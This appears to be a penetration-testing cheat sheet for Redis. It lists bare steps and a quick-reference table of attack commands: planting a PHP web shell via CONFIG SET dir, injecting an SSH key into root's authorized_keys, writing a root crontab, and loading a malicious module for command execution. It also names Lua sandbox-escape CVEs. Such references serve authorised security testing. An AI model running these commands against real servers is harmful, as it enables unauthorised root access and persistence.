Service Detection
Connect
Check Auth Required
NOAUTH error → password required.
Brute-Force
Enumeration
Web Shell (If Web Root Known)
http://TARGET/shell.php?cmd=id
SSH Key Injection
Generate Key
Inject
Connect
Cron Job Injection
Module RCE
Load malicious Redis module for command execution.Lua Script Execution
The Redis Lua sandbox blocksio/os (only os.clock/os.time are exposed), so this fails on default Redis. RCE via Lua needs a sandbox-escape bug — e.g. CVE-2022-0543 (Debian/Ubuntu packaging flaw) using package.loadlib to reach liblua, or CVE-2025-49844.
NSE Scripts
Quick Reference
| Check | Command |
|---|---|
| Connect | redis-cli -h TARGET |
| Web shell | CONFIG SET dir /var/www/html/; SET payload "<?php..." |
| SSH key | Inject pub key to /root/.ssh/authorized_keys |
| Cron RCE | Write to /var/spool/cron/crontabs/root |
| Module RCE | MODULE LOAD module.so; system.exec "cmd" |